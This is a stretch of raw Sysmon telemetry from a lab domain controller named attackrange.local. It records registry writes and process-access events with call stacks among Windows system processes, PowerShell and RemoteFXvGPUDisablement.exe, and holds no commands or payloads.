12:00:46.221{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\CountDWORD (0x00000001) 13241300x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.221{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\0SWD\IP_TUNNEL_VBUS\ISATAP_1 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.221{266CAFBE-646C-6064-1200-00000000AE01}11961372C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.206{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.190{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.190{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-1E00-00000000AE01}2332C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.174{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2312C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.174{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-1C00-00000000AE01}2304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.159{266CAFBE-646C-6064-1000-00000000AE01}11241968C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.159{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.159{266CAFBE-646C-6064-1000-00000000AE01}11241968C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.143{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.143{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.143{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.143{266CAFBE-646C-6064-1000-00000000AE01}11241968C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
